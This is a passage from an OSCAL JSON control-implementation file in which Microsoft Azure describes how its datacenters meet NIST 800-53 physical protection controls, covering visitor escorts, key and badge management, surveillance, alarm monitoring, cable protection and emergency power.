Azure datacenters do not contain areas that are designated as publicly accessible."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"4651051d-33a5-45c6-a576-c8d78c07a9da","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-014"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-3_smt.d","by-components":[{"uuid":"616009db-67c3-4b9d-bfe5-3dfe0439a9fd","export":{"provided":[{"uuid":"453e9351-2871-4a18-b190-8a4386a622da","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-014"}],"description":"All visitors that have approved access to the datacenter are designated as \"Escort Only\" on their badges and are always required to remain with their escorts. Escorted visitors do not have any access levels granted to them and can only travel on the access of their escorts. Escorts monitor all activities of their visitor while in the datacenter."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"58b21dfc-5524-4f0f-857f-42f11a4cc6d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-015"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-3_smt.e","by-components":[{"uuid":"7bfb9d5d-cd9a-4b90-acc8-69c66b1be6b4","export":{"provided":[{"uuid":"95bb1a09-708f-4c32-bb37-615313d7ba32","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-015"}],"description":"Physical keys and temporary access badges are secured within the datacenter security operations center. 
Temporary access badges are stored within the access-controlled datacenter security operations center (SOC) and inventoried at the beginning and end of each shift. Security officers are staffed twenty-four (24) hours a day, seven (7) days a week. Physical keys are stored in an electronic key management system. These key management systems are linked to the physical access system and require a security officer's PIN and access smart card to gain access. Keys are checked out to specific personnel by matching the person's access smart card to the physical key. A person must have the appropriate access level in DCAT to allow them to check out specific keys. Key inventories are conducted during each shift and keys are not allowed to be taken offsite."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"8141d10c-83bc-4eaa-b1a1-ec7850322ec8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-016"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-3_smt.f","by-components":[{"uuid":"21e50e76-d11a-415a-9d04-bdf69f9898c6","export":{"provided":[{"uuid":"868f1e09-28d9-4ba1-ba7f-f5d5179b820a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-016"}],"description":"Physical access devices within Azure datacenters are inventoried on at least an annual basis. Keys and temporary access badges are inventoried multiple times a day at the beginning of each shift. 
Access smart card readers and similar access devices are linked to the physical security system, where their status is continuously displayed."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"7fc96323-6c43-47a6-acda-daad9b0c955d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-017"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-3_smt.g","by-components":[{"uuid":"a1e78216-495f-4936-9870-2570c5fe7ec6","export":{"provided":[{"uuid":"7e8b3854-d984-4063-b9a8-0bc526a40aff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-017"}],"description":"Azure datacenters have procedures to implement in cases when an access smart card or key is lost or a person is terminated or transferred. In the event of a termination or transfer, the person's access is immediately removed from the DCAT system and their access smart card removed. This removes any datacenter access the person may have had. DCM teams also perform quarterly access reviews to validate the appropriateness of the datacenter access list in DCAT. Azure does not require the annual re-keying of locks because Azure datacenters do not use physical keys as a primary access method to the facility. Microsoft's policy is that no physical keys may leave the site, and no physical keys are permanently issued to individuals. The primary access methods at Azure datacenters are electronic access smart cards and biometrics, which allow for immediate revocation of access as required. Azure mitigates the risks that annual re-keying is meant to address through its primary reliance on electronic and biometric access controls, strict assignment of access levels, and controlled distribution and management of keys. 
Additional security controls such as security patrols, video surveillance, and door alarms help mitigate this risk. Use of keys to open doors in lieu of access smart cards and/or biometrics where required within the datacenters results in a door alarm that requires the Control Room Supervisor to acknowledge the alarm and dispatch a security responder to investigate. If after an investigation a key is determined to be lost, Azure has procedures in place to determine the appropriate action commensurate with the risk posed by the loss of that specific key. These actions could range from the re-keying of a single server rack or door up to the re-keying of the entire datacenter facility."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"414b790a-114e-47c8-9166-0a767b11141b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-3.1","statements":[{"uuid":"aae1ea1d-5d6e-465d-89ed-d8c570f248df","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-018"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-3.1_smt","by-components":[{"uuid":"a270d820-eea4-4be5-96cb-a2811cdedbaf","export":{"provided":[{"uuid":"cd03d59a-2e25-4230-975d-bd2069c7d7c2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-018"}],"description":"Access authorizations at Azure colocations are managed through the Datacenter Access Tool (DCAT). 
DCAT contains the authorized access lists of personnel who have been approved by the Datacenter Management (DCM) team."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"ffd8d5c8-07a9-4291-b452-a0260b6be2a0","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-4","statements":[{"uuid":"bb9a93db-3a19-4cdf-ad43-14b54b92bbc8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-019"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-4_smt","by-components":[{"uuid":"b800ee58-d341-414a-bc8e-938019a4c6db","export":{"provided":[{"uuid":"7506eb58-6cce-4768-b7a3-0bb118718d3b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-019"}],"description":"Azure has implemented access control for transmission medium through the design and building of the Main Distribution Frame (MDF) rooms, Intermediate Distribution Frame (IDF) rooms, and colocations to protect information system distribution and transmission lines from accidental damage, disruption, and physical tampering. Access to MDF rooms, IDF rooms, and colocations requires multifactor authentication via access smart card and biometrics. This ensures that access is restricted to only authorized personnel. Within the MDF and IDF, transmission and distribution lines are protected from accidental damage, disruption, and physical tampering using metal conduits, locked racks, cages, or cable trays. 
MDFs and IDFs where Azure networking equipment is housed are restricted access areas limited to cleared personnel who have passed an enhanced background screening, or to individuals who are escorted while in the MDF or IDF by a person who is cleared and is an authorized government data escort. Signage on these MDF and IDF doors identifies the area as restricted access."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"962b47dc-2364-4a80-91c0-ac5c25af43ab","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-5","statements":[{"uuid":"e2db09ec-3fc0-4c66-a85d-21abf7168dc2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-020"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-5_smt","by-components":[{"uuid":"6d5a4bee-c350-474e-b393-d6a98443f8ce","export":{"provided":[{"uuid":"204c7185-271f-49f2-9a76-138a12c46bf2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-020"}],"description":"Azure datacenters do not have output devices (monitors, printers, audio devices, etc.) permanently connected to Azure assets or Azure shared assets. In addition to not having output devices, security officers perform physical walkthroughs of the facility multiple times per shift checking for items like doors being locked and racks being secured. Datacenter access is limited to people who have approved access authorizations. 
Colocations require multifactor authentication (access smart card and biometrics) to gain access."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"785938ab-5c93-4650-b8a7-d5be07c47ca6","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-6","statements":[{"uuid":"43794e71-5903-4b72-aff0-064a8bf8e0c9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-021"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-6_smt.a","by-components":[{"uuid":"6c6a9da2-ff85-42ae-951f-c8ba6e597630","export":{"provided":[{"uuid":"85b75b65-1250-4a57-8a5f-02cff082edf6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-021"}],"description":"Physical access is monitored by implementing security devices and processes at the datacenters. Examples include twenty-four (24) hours a day, seven (7) days a week electronic monitoring of access control, alarm and video systems as well as twenty-four (24) hours a day, seven (7) days a week on site security patrols of the facility and grounds. A Control Room Supervisor is located in the datacenter security operations center at all times to provide monitoring of physical access in the datacenter.\n\nCCTV is employed to monitor physical access to the datacenter and the information system. The CCTV is linked to the building alarm monitoring system to provide physical access monitoring of alarm points. 
Cameras are positioned to monitor perimeter doors, facility entrances and exits, all colocation rows and aisles, all racks, caged areas, high-security areas, shipping and receiving, facility external areas such as parking lots, and other areas of the facility.\n\nSecurity officers provide Azure with a security program staffed with highly-trained security officers capable of accomplishing the following:\n\n* Ensuring that only those personnel with proper authorization are allowed access to Azure Critical Infrastructure.\n* Ensuring that personnel and visitors bringing equipment into and out of critical infrastructure facilities follow proper procedures to prevent intentional or unintentional loss.\n* Constant patrolling allows officers to respond to, observe and report all incidents that may compromise security at Microsoft. All incidents observed are reported to the Control Room Supervisor.\n* Identifying, escalating, and preventing criminal or unsafe activity, and being familiar with, adhering to, and enforcing Azure policies and procedures."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"2a57f33b-e3b7-45b0-8799-8ca1c72e9920","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-022"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-6_smt.b","by-components":[{"uuid":"b2dd3e40-f83a-40dd-8f71-0200ff1cac21","export":{"provided":[{"uuid":"c0ecc3c0-e549-4526-90f0-7d9c060c27bc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-022"}],"description":"To access an Azure datacenter, a person must have a DCAT request approved by the Datacenter Management (DCM) team. 
To enter an Azure datacenter, a person must check in with the datacenter security operations center (SOC), which is staffed twenty-four (24) hours a day, seven (7) days a week, to have their access activated. A person's physical access within the datacenter is reviewed continuously by the Control Room Supervisor in the SOC. The Control Room Supervisor monitors live camera feeds within the datacenter as well as the alarm monitoring system reports from all physical security access devices within the datacenter. Physical access is reported in the alarm monitoring system as approved or failed. Failed access results in an alarm status that requires action by the Control Room Supervisor. The Control Room Supervisor can dispatch a responder for further investigation if needed. The physical access logs in the alarm monitoring system are reviewed continuously and are also retained as log files for subsequent investigative review."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"31d4c25a-62d2-43b7-bbb9-3087a129e2bb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-023"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-6_smt.c","by-components":[{"uuid":"14417ece-06ea-4c3b-bd98-b779356c528c","export":{"provided":[{"uuid":"6dce3a63-7d31-4f75-bb55-1bea7964052c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-023"}],"description":"Security events that occur within the datacenter are documented by the security team in a report called a Significant Event Notification (SEN). 
SEN reports capture the details of a security event and are required to be documented after an event occurs in order to capture details as accurately as possible.\n\nSEN reports also contain the investigative analysis conducted in an After Action Report (AAR). AAR reports document the investigation into a security event and attempt to identify the root cause of the event. Additionally, any remediation actions or lessons learned are also included in the AAR, so that security procedures can be improved across the Azure datacenter security program.\n\nIn the event an incident impacts Azure assets or services, the Azure Security Response Team has procedures in place to respond to such incidents. For incidents requiring government notification, the Security Response Team coordinates with the service team to notify the government agency customer, US-CERT, and authorizing officials within US-CERT guidelines.\n\nAzure Third-Party (Leased) Datacenters\n\nAt leased datacenter locations, security events are communicated to the DCM team and escalated based on severity. 
The DCM team determines additional investigation or escalation."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"f07888ec-38dc-475a-809c-0984a6737e79","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-6.1","statements":[{"uuid":"9992b593-cb1e-4d0c-9dad-58c526e5b62b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-024"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-6.1_smt","by-components":[{"uuid":"76e471bd-8520-4767-b06e-f8889b7a0cce","export":{"provided":[{"uuid":"cc86ff57-6790-43e7-ac7b-5806a31d2404","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-024"}],"description":"In addition to the twenty-four (24) hours a day, seven (7) days a week onsite security, Azure datacenters also utilize alarm monitoring systems. This provides real-time alarm and video monitoring. Datacenter doors have alarms that report when they are opened or when they remain open past a programmed length of time. Doors can also be programmed to display the live CCTV image when a door alarm is triggered. Additionally, the Control Room Supervisor constantly monitors a live feed of camera views from high security and high traffic areas. DCAT is also used to control access badge management (creation and modification). Access card and biometric hand geometry and fingerprint readers are programmed and monitored through the alarm monitoring system. Alarms are monitored and responded to by the Control Room Supervisor stationed twenty-four (24) hours a day, seven (7) days a week in the datacenter security operations center. 
During a response situation, the Control Room Supervisor utilizes cameras in the area of the incident being investigated to give the responder real-time information."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"e30e1d0a-df47-42d4-b8b9-a7bbff72fc2e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-6.4","statements":[{"uuid":"f343fcf5-6597-46a2-9cd0-c2f325d05b23","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-025"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-6.4_smt","by-components":[{"uuid":"cae540de-d408-4ca5-a081-3121363e820d","export":{"provided":[{"uuid":"64b0106b-1508-43d7-b0ff-12a191723766","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-025"}],"description":"In addition to the physical access monitoring of the facility, Azure monitors the physical access to the information systems within the datacenters. All Microsoft online services equipment is placed in locations within datacenters where physical access is monitored. 
All colocation and Main Distribution Frame (MDF) rooms are protected by access control, alarms, and video."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"004344fc-a9bf-46fc-bc5f-042f2f58005c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-8","statements":[{"uuid":"0014439d-f3c3-4677-af06-cc22e45931c3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-026"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-8_smt.a","by-components":[{"uuid":"e7eddab0-0772-4a6c-bd45-eecb400ea10a","export":{"provided":[{"uuid":"233c5a27-1202-453d-ada7-ffdfd6916454","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-026"}],"description":"Visitor datacenter access records are maintained in DCAT in the form of approved DCAT requests. DCAT requests can only be approved by the Datacenter Management (DCM) team. All visitor access requests to Azure datacenters are recorded in DCAT and are available for future possible investigations. Visitors are always required to be escorted and are not granted any access to Azure datacenters. The escort's access within the datacenter is logged within the Lenel OnGuard Alarm Monitoring System and, if necessary, can be correlated to the visitor for future review.\n\nAzure Third-Party (Leased) Datacenters\n\nFor leased datacenters, Azure is provided monthly with a log of all access attempts to the Microsoft areas. 
Visitor access records processed for both owned and leased Azure datacenters are retained for 3 years."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"616b59aa-30c7-4c19-944e-0668b1a6552f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-027"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-8_smt.b","by-components":[{"uuid":"f5d3ecba-316f-4321-a3bd-b630bc2a4bee","export":{"provided":[{"uuid":"548d1ceb-3100-4bc3-a219-6a270c433cde","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-027"}],"description":"Visitors are always required to be escorted. The escort's access within the datacenter is logged within the alarm monitoring system and, if necessary, can be correlated to the visitor for future review. Visitor access is reviewed continuously by the assigned escort and by the Control Room Supervisor via CCTV and the alarm monitoring system. Visitors are not provided with access and must always be accompanied by their escorts. Visitors with an approved DCAT access request have their access request reviewed at the time their identification is verified against a valid government issued ID or Microsoft issued smart card. Visitors approved for escorted access are issued a sticky badge. Additionally, when a visitor concludes their visit by returning their sticky badge to the Control Room Supervisor (CRS), the CRS terminates the visitor's DCAT access record during a final review. Azure maintains visitor access records within the DCAT database for possible future investigations. Additionally, visitors assigned a Visitor or Tour access level in DCAT are always required to have an escort present. 
The escort is responsible for reviewing the actions and access of their visitor during their visit to the datacenter.\n\nAzure Third-Party (Leased) Datacenters\n\nAt leased datacenter locations, visitors to Microsoft areas are always required to be escorted and wear a badge that indicates their visitor status. The escort is responsible for reviewing the actions and access of their visitor during their visit to the datacenter."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"6e49d5bb-75f3-48d5-8179-d7ba4f2a2bff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-028"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-8_smt.c","by-components":[{"uuid":"10f3d460-ed6b-424c-8d74-4c55ab80a8be","export":{"provided":[{"uuid":"ffc7ad03-78f6-433a-9c56-7aa1d954dff5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-028"}],"description":"Visitor datacenter access records are maintained in DCAT in the form of approved DCAT requests. DCAT requests can only be approved by the Datacenter Management (DCM) team. All visitor access requests to Azure datacenters are recorded in DCAT and are available for future possible investigations. Visitors are always required to be escorted and are not granted any access to Azure datacenters. The escort's access within the datacenter is logged within the Lenel OnGuard Alarm Monitoring System and, if necessary, can be correlated to the visitor for future review. Anomalies in visitor access records are reported to Datacenter Management and Security Teams for investigation.\n\nAzure Third-Party (Leased) Datacenters\n\nFor leased datacenters, Azure is provided monthly with a log of all access attempts to the Microsoft areas. 
Visitor access records processed for both owned and leased Azure datacenters are retained for 3 years. Anomalies in visitor access records are reported to Datacenter Management and Security Teams for investigation."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"485c9865-cc0f-45c6-b480-8504cb664468","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-8.1","statements":[{"uuid":"309f8fff-7115-4462-bc90-0b9deb76d7b6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-029"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-8.1_smt","by-components":[{"uuid":"332e7ee7-2813-48de-8fda-7ea53bce5159","export":{"provided":[{"uuid":"7caed60f-9b6b-4057-9643-0122fa2bb4f5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-029"}],"description":"Datacenter access records are maintained in DCAT in the form of approved DCAT requests. DCAT requests can only be approved by the Datacenter Management (DCM) team. Access levels within the datacenter are assigned and managed within DCAT. Datacenter access is reviewed quarterly. All access to Azure datacenters is recorded in DCAT and is available for future possible investigations. Visitors are always required to be escorted. The escort's access within the datacenter is logged within the alarm monitoring system and, if necessary, can be correlated to the visitor for future review. Visitor access is reviewed continuously by the assigned escort and by the Control Room Supervisor via CCTV and the alarm monitoring system. 
Visitors are not provided with access and must always be accompanied by their escorts. DCAT is the automated mechanism used to maintain and review visitor access records."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"bea3b483-ffd0-431a-9fc8-f6ba23f5b05c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-9","statements":[{"uuid":"e80c5900-cdad-4e99-8dd3-8cec8368d64b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-030"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-9_smt","by-components":[{"uuid":"361a3754-e9e2-495e-9abd-0f23517dc4d1","export":{"provided":[{"uuid":"ab73fb27-d239-43ab-abb4-ed5f77ff1a08","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-030"}],"description":"Azure provides protective spaces and appropriate labeling for cables. Azure equipment such as cables, electrical lines, and backup generators must be placed in environments which have been engineered to be protected from environmental risks such as theft, fire, explosives, smoke, water, dust, vibration, earthquake, harmful chemicals, electrical interference, power outages, and electrical disturbances (spikes). All portable online services assets (e.g. racks, servers, network devices) must be locked or fastened in place to provide protection against theft or movement damage. Power and information system cables within any Azure environment are labeled appropriately and protected against interception or damage. Power and information system cables are separated from each other at all points within an environment to avoid interference. Power cables are run under the floors, overhead in cable trays, and within cabinets for protection from moving parts and accidental damage. 
All electrical spaces are behind card readers or additional key locks as appropriate. Access hallways as well as exterior entrances and equipment yards approaching the protective spaces are all monitored via video surveillance.\n\nPower systems also utilize redundancy as a form of protection. Datacenters utilize multiple power/utility feeds into the facility as well as redundant configurations of generators and UPS systems. Generator and UPS system components undergo regular maintenance procedures to maintain the systems in proper working order."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"ad1a1aee-9f42-48e0-9854-71a2c5f928a5","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-10","statements":[{"uuid":"bc6f03b5-3e1e-401f-ac06-fd67935ab1de","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-031"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-10_smt.a","by-components":[{"uuid":"4963ed8a-95b7-4b2b-90f6-c7de688a6715","export":{"provided":[{"uuid":"acfca9f7-7473-4dfc-a2d5-949129930f3d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-031"}],"description":"Azure has installed Emergency Power Off (EPO) Buttons in locations within the datacenter only as required by local fire code. 
Azure Third-Party (Leased) Datacenters: Azure leased datacenters may have EPO buttons installed at the colocation rooms at the discretion of the colocation provider, but this is not currently required by Microsoft."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"8c38fa9e-158a-4bc0-a51f-6557d5837956","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-032"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-10_smt.b","by-components":[{"uuid":"8204caad-069b-4863-849e-72203a5e19a2","export":{"provided":[{"uuid":"3a328442-35f7-4722-a717-347be66988f8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-032"}],"description":"When present, EPO buttons are strategically placed to allow for activation in emergency situations. EPO buttons can be placed in the colocations, manned Facilities Operation Centers (FOCs), or as required by local fire code. 
In most Azure datacenters, the datacenter design no longer requires EPO buttons."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"ebf49086-8fff-40f1-b09e-ac68d38cd944","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-033"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-10_smt.c","by-components":[{"uuid":"141b57c2-5346-43a8-85e7-a2ff2ecc3283","export":{"provided":[{"uuid":"981224c2-117a-45c8-ad7d-54ce63851bda","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-033"}],"description":"When present, to prevent accidental activation, EPO buttons may have a protective enclosure, require dual activation, or utilize an audible alarm as a warning before activation. Additionally, EPO buttons are under video surveillance."}]},"description":"See inheritance 
statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"b1d3a4fb-b93f-4685-be6e-5754bb3daaf0","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-11","statements":[{"uuid":"7605d3b6-a2b1-4179-9b27-10fb907d9d17","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-034"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-11_smt","by-components":[{"uuid":"211e99ca-0cd1-46e5-9a8a-acc4c059158b","export":{"provided":[{"uuid":"22c078c5-90f8-48d3-9237-d832863f4016","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-034"}],"description":"Azure has implemented the control for emergency power by protecting datacenter equipment and circuits with an uninterruptible power supply (UPS) system which provides a short-term power supply until generators are able to come online and transition the load. Azure utilizes various forms of UPS systems and generators throughout its datacenters. Azure datacenters are designed with at least an n+1 configuration for electrical and cooling systems. Azure datacenters maintain sufficient onsite fuel storage to operate for approximately 48 hours. 
